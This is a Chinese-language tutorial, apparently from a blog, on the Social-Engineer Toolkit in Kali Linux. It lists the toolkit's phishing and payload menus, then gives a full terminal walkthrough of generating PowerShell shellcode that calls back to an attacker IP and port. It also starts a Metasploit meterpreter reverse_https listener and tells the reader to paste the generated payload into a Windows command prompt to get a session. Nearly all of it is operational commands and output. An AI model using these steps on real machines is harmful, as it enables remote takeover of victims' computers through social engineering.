kali能实现什么攻击?Kali系列社工攻击
kali能实现什么攻击?Kali系列社工攻击6) arduino-Based Attack Vector 基于arduino的攻击5) Mass Mailer Attack 群发邮件攻击2) Website Attack Vectors 网站攻击3) Infectious Media Generator 介质感染攻击4) Create a Payload and Listener
命令:setoolkit
选择#:1
解释:
1) Spear-Phishing Attack Vectors:鱼叉式钓鱼攻击
2) Website Attack Vectors 网站攻击
3) Infectious Media Generator 介质感染攻击
4) Create a Payload and Listener
5) Mass Mailer Attack 群发邮件攻击
6) arduino-Based Attack Vector 基于arduino的攻击
7) Wireless Access Point Attack Vector 无线接入点攻击
8) QRCode Generator Attack Vector 二维码攻击
9) Powershell Attack Vectors :Powershell 攻击
10) Third Party Modules
-------------------------------Powershell 攻击案例****----------------------------------------------------------------------------------------
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 9
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>1
Enter the IPAddress or DNS name for the reverse host: 192.168.179.128
set:powershell> Enter the port for the reverse [443]:1112
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified outputting raw payload
Payload size: 383 bytes
Final size of c file: 1634 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.73-dev ]
-- --=[ 1965 exploits - 1095 auxiliary - 337 post ]
-- --=[ 558 payloads - 45 encoders - 10 nops ]
-- --=[ 7 evasion ]
[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 1112
LPORT => 1112
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/reports/powershell/powershell.rc)> Exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed but no session was created.
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:1112
之后:
命令窗口:cd /root/.set/reports/powershell/
命令窗口:cat x86_powershell_injection.txt
把上述x86_powershell_injection.txt中内容放进windows cmd命令窗口执行,kali即可以看到会话;